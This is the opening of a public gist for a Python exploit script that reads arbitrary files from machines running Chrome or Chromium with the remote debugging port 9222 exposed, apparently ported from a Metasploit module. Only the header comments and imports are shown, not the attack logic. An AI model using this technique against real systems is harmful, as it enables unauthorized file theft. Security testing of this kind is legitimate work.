pich4ya
/ chrome_remote_debug_lfi.py
Created
March 6, 2023 11:49
Chrome Debugger Local File Inclusion (No CVE, a security misconfiguration if the port is accessible for the attacker)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # @author Pichaya Morimoto ([email protected]) | |
| # Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb | |
| # pip install requests websocket-client python-socks | |
| # This exploit code can be used to read arbitrary files on the victim machine with | |
| # chrome/chromium --remote-debugging-port=9222, usually runs as a test automation tool in any software testing phase | |
| import requests | |
| import json | |
| import urllib3 | |
| import websocket |